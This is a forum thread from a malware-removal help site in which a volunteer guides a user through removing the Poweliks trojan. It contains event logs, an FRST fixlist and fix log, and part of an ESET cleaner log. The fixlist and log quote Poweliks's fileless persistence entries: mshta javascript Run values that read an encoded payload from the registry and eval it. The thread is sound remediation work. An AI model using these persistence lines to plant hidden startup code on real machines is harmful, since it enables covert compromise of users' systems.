Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

 

Error: (10/16/2016 12:41:16 AM) (Source: WinMgmt) (EventID: 10) (User: )

Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

 

Error: (10/15/2016 11:56:50 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

 

Error: (10/15/2016 11:33:31 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

 

Error: (10/15/2016 11:27:46 PM) (Source: VSS) (EventID: 8194) (User: )

Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.

.

This is often caused by incorrect security settings in either the writer or requestor process.

 

 

Operation:

   Gathering Writer Data

 

Context:

   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}

   Writer Name: System Writer

   Writer Instance ID: {8a920161-5c39-41dc-aa22-1c4df677717b}

 

Error: (10/15/2016 11:08:01 PM) (Source: McLogEvent) (EventID: 259) (User: NT AUTHORITY)

Description: The file C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8faea2.lnk contains the Trojan-PoweLike!lnk Trojan. Undetermined clean error, deleted successfully. Detected using Scan engine version 5800.7501 DAT version 8319.0000.

 

Error: (10/15/2016 10:25:37 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: CAMService.exe, version: 1.0.0.1, time stamp: 0x54077d08

Faulting module name: ntdll.dll, version: 6.1.7601.23543, time stamp: 0x57d2fde1

Exception code: 0xc0000005

Fault offset: 0x0000000000048d84

Faulting process id: 0x76c

Faulting application start time: 0x01d22786cbc649bb

Faulting application path: C:\Program Files\Intel\CAM\bin\CAMService.exe

Faulting module path: C:\Windows\SYSTEM32\ntdll.dll

Report Id: 1cfe611b-937a-11e6-84b8-f0def19d1112

 

 

System errors:

=============

Error: (10/16/2016 11:10:52 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 20.

 

Error: (10/16/2016 10:49:12 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 20.

 

Error: (10/16/2016 10:39:59 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 20.

 

Error: (10/16/2016 09:40:27 AM) (Source: Service Control Manager) (EventID: 7026) (User: )

Description: The following boot-start or system-start driver(s) failed to load:

cdrom

 

Error: (10/16/2016 09:39:56 AM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

 

Error: (10/16/2016 08:31:58 AM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The CAM Service service terminated unexpectedly.  It has done this 1 time(s).

 

Error: (10/16/2016 08:31:51 AM) (Source: Service Control Manager) (EventID: 7026) (User: )

Description: The following boot-start or system-start driver(s) failed to load:

cdrom

 

Error: (10/16/2016 08:31:19 AM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

 

Error: (10/16/2016 12:41:13 AM) (Source: Service Control Manager) (EventID: 7026) (User: )

Description: The following boot-start or system-start driver(s) failed to load:

cdrom

 

Error: (10/16/2016 12:40:41 AM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

 

 

==================== Memory info ===========================

 

Processor: Intel® Core™ i5-2520M CPU @ 2.50GHz

Percentage of memory in use: 64%

Total physical RAM: 3979.23 MB

Available physical RAM: 1397.7 MB

Total Virtual: 7956.65 MB

Available Virtual: 4766.94 MB

 

==================== Drives ================================

 

Drive c: (Windows7_OS) (Fixed) (Total:287.15 GB) (Free:217.63 GB) NTFS ==>[system with boot components (obtained from drive)]

Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:1.54 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (Size: 298.1 GB) (Disk ID: 8D14B1C3)

Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)

Partition 2: (Not Active) - (Size=287.2 GB) - (Type=07 NTFS)

Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

 

==================== End of Addition.txt ============================

 

How can I delete this trojan?  Any help you can provide is appreciated.

Thank you!



BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:25 AM

Posted 18 October 2016 - 10:30 AM

Hi pmate888 :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Looks like you're indeed infected with Poweliks. We'll use FRST to remove it, and I'll ask you to run ESET Poweliks Cleaner again to make sure it's gone.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press on Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CloseProcesses:
    CreateRestorePoint:
    
    Zip: C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk;C:\Users\Wayne\AppData\Local\1282a1\9dc0dc.bat
    
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**npfolr<*>] => "C:\Windows\system32\mshta.exe" javascript:kOer93kVe="gV8";YH7=new%20ActiveXObject("WScript.Shell");EQ6ORLQ="P";Y8Xx3V=YH7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");dS8UOEZo="JW2r1GN";eval(Y8Xx3V);s (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**ypqwknh<*>] => "C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk" <===== ATTENTION (Value Name with invalid characters)
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {adad7ac6-fdcf-11e0-aba0-806e6f6e6963} - Q:\LenovoQDrive.exe
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {b16e947a-43af-11e5-863b-f0def19d1112} - D:\LaunchU3.exe
    Startup: C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\472856.lnk [2016-10-16]
    
    Toolbar: HKLM - No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File
    Toolbar: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File
    
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:dsaT6h="Sz";w6y7=new ActiveXObject("WScript.Shell");a9iPMbV="oYd";jpfB1=w6y7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");mx28du="7";eval(jpfB1);W51AyG="0mYHVY";" <===== ATTENTION
    
    C:\ProgramData\APN
    C:\Users\Wayne\AppData\Local\1282a1
    C:\Users\Wayne\AppData\Local\WiDiSetupLog.20150507.230312.wdl
    C:\Users\Wayne\AppData\Roaming\1282a1
    C:\Users\Wayne\AppData\Roaming\403522
    
    EmptyTemp:
    
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;
Follow the Steps 6 to 10 in the guide below to scan your computer with ESET Poweliks Cleaner, and copy/paste the content of the output log in your next reply after.

http://www.bleepingcomputer.com/virus-removal/remove-poweliks-trojan

After running the FRST fix, a file called Upload.zip will be created on your desktop. Upload it to the link below please.

http://www.bleepingcomputer.com/submit-malware.php?channel=194

After running FRST, ESET and restarting, do you still get warnings about Poweliks?

Your next reply(ies) should include:
  • Copy/pasted content of FRST's fixlog.txt;
  • Copy/pasted content of the ESET Poweliks Cleaner log;
  • Confirmation that you uploaded the Upload.zip file to the link provided above;
  • Answer to my question about Poweliks-related alerts on your system;

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 pmate888

pmate888
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:03:25 AM

Posted 19 October 2016 - 02:27 AM

Hi Aura

 

Thank you for responding and offering you expertise.  The contents of the FRST fixlog.txt file is:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Wayne (18-10-2016 20:26:22) Run:2
Running from C:\Users\Wayne\Desktop
Loaded Profiles: Wayne (Available Profiles: Wayne)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:

Zip: C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk;C:\Users\Wayne\AppData\Local\1282a1\9dc0dc.bat

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**npfolr<*>] => "C:\Windows\system32\mshta.exe" javascript:kOer93kVe="gV8";YH7=new%20ActiveXObject("WScript.Shell");EQ6ORLQ="P";Y8Xx3V=YH7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");dS8UOEZo="JW2r1GN";eval(Y8Xx3V);s (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**ypqwknh<*>] => "C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {adad7ac6-fdcf-11e0-aba0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {b16e947a-43af-11e5-863b-f0def19d1112} - D:\LaunchU3.exe
Startup: C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\472856.lnk [2016-10-16]

Toolbar: HKLM - No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File
Toolbar: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:dsaT6h="Sz";w6y7=new ActiveXObject("WScript.Shell");a9iPMbV="oYd";jpfB1=w6y7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");mx28du="7";eval(jpfB1);W51AyG="0mYHVY";" <===== ATTENTION

C:\ProgramData\APN
C:\Users\Wayne\AppData\Local\1282a1
C:\Users\Wayne\AppData\Local\WiDiSetupLog.20150507.230312.wdl
C:\Users\Wayne\AppData\Roaming\1282a1
C:\Users\Wayne\AppData\Roaming\403522

EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
================== Zip: ===================
"C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk" -> not found
"C:\Users\Wayne\AppData\Local\1282a1\9dc0dc.bat" -> not found
=========== Zip: End ===========
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**npfolr<*> => value could not remove. Error in Deleting Value: C0000034
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**ypqwknh<*> => value could not remove. Error in Deleting Value: C0000034
"HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{adad7ac6-fdcf-11e0-aba0-806e6f6e6963}" => key removed successfully
HKCR\CLSID\{adad7ac6-fdcf-11e0-aba0-806e6f6e6963} => key not found.
"HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b16e947a-43af-11e5-863b-f0def19d1112}" => key removed successfully
HKCR\CLSID\{b16e947a-43af-11e5-863b-f0def19d1112} => key not found.
C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\472856.lnk => not found.
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => value removed successfully
HKCR\CLSID\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => key not found.
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => value removed successfully
HKCR\CLSID\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => key not found.
"HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc" => key removed successfully
C:\ProgramData\APN => moved successfully
C:\Users\Wayne\AppData\Local\1282a1 => moved successfully
C:\Users\Wayne\AppData\Local\WiDiSetupLog.20150507.230312.wdl => moved successfully
C:\Users\Wayne\AppData\Roaming\1282a1 => moved successfully
C:\Users\Wayne\AppData\Roaming\403522 => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 6437753 B
Java, Flash, Steam htmlcache => 3174 B
Windows/system/drivers => 1053667 B
Edge => 0 B
Chrome => 10547453 B
Firefox => 140262408 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 0 B
Wayne => 338853656 B

RecycleBin => 6362 B
EmptyTemp: => 482.1 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 20:28:19 ====

 

 

The contents of the ESET Poweliks Cleaner log file is:

 

[2016.10.18 21:01:30.813] - Begin
[2016.10.18 21:01:30.815] -
[2016.10.18 21:01:30.857] -     ....................................
[2016.10.18 21:01:30.858] -   ..::::::::::::::::::....................
[2016.10.18 21:01:30.860] -   .::EEEEEE:::SSSSSS::..EEEEEE..TTTTTTTT..    Win32/Poweliks
[2016.10.18 21:01:30.862] -  .::EE::::EE:SS:::::::.EE....EE....TT......   Version: 1.0.0.5
[2016.10.18 21:01:30.864] -  .::EEEEEEEE::SSSSSS::.EEEEEEEE....TT......   Built: Jun 30 2015
[2016.10.18 21:01:30.865] -  .::EE:::::::::::::SS:.EE..........TT......
[2016.10.18 21:01:30.867] -   .::EEEEEE:::SSSSSS::..EEEEEE.....TT.....    Copyright © ESET, spol. s r.o.
[2016.10.18 21:01:30.868] -   ..::::::::::::::::::....................    1992-2015. All rights reserved.
[2016.10.18 21:01:30.868] -     ....................................
[2016.10.18 21:01:30.868] -
[2016.10.18 21:01:30.868] - --------------------------------------------------------------------------------
[2016.10.18 21:01:30.868] -
[2016.10.18 21:01:30.869] - INFO: OS: 6.1.7601 SP1
[2016.10.18 21:01:30.870] - INFO: Product Type: Workstation
[2016.10.18 21:01:30.870] - INFO: WoW64: True
[2016.10.18 21:01:30.870] - INFO: Machine guid: 3E3956B5-9F1A-4AA7-9D59-1B87E601D065
[2016.10.18 21:01:30.871] -
[2016.10.18 21:01:31.028] - INFO: Scanning for system infection...
[2016.10.18 21:01:31.028] - --------------------------------------------------------------------------------
[2016.10.18 21:01:31.028] -
[2016.10.18 21:01:31.028] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]...
[2016.10.18 21:01:31.029] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]...
[2016.10.18 21:01:31.031] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2016.10.18 21:01:31.031] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2016.10.18 21:01:31.031] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]...
[2016.10.18 21:01:31.032] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]...
[2016.10.18 21:01:31.033] - INFO: Processing classes...
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0003-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0004-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0005-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0000-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0001-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0001-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0002-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0002-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0003-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0003-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0004-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0004-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0005-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0005-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0006-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0006-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0007-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0008-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0008-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0010-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0010-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0011-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.212] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0011-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.213] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0012-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.213] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0012-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.213] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0013-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.213] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0013-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.213] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0014-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.213] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0014-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.213] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0015-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.213] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0015-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.213] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0016-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.213] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0016-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0017-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0017-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0018-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0018-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0019-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0019-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0020-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0020-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0021-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0021-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.214] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0000-ABCDEFFEDCBA}]
